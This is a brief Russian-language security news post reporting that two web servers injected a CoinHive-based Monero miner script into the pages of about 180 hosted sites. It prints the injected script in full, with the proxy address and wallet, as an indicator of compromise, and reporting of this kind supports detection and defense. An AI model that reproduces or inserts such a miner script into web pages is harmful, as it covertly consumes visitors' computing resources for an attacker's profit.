Майнер от веб-сервера

В январе текущего года компания Securi, во время расследования обнаружила вредоносный код, который поступал непосредственно с сервера.

При дальнейшей проверке было идентифицировано, два сервера, которые автоматически вводился код «майнера» на каждую веб-страницу после тега </ head> или </ title>. Сами сайты не были инфицированы. Вредоносная программа поступала с веб-сервера, который на ходу изменял веб-страницы. До сих пор идентифицировано два сервера, это 5.196.91.117 и 104.243.40.34 , причем около 60 и 120 сайтов соответственно.

Скрипт
<script src="hxxps://coinhive[.]com/lib/coinhive.min.js"></script>
<script>CoinHive.CONFIG.WEBSOCKET_SHARDS = [["ws://176.10.104 .249:8892"]];
var miner = CoinHive.Anonymous('49MvxieMYbGSbamYfv2ajQ52KqGATcGttPNhPCb4TXj3B2FimiUav7nF3hSWioTqujByt2cVietKNVwCkVRGX2qpC58N79b');</script>
Это модификация обычного майнера CoinHive, который использует альтернативный прокси ( 176.10.104.249:8892 ) и этот адрес Monero49MvxieMYbGSbamYfv2ajQ52KqGATcGttPNhPCb4TXj3B2FimiUav7nF3hSWioTqujByt2cVietKNVwCkVRGX2qpC58N79b.

Поделиться

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *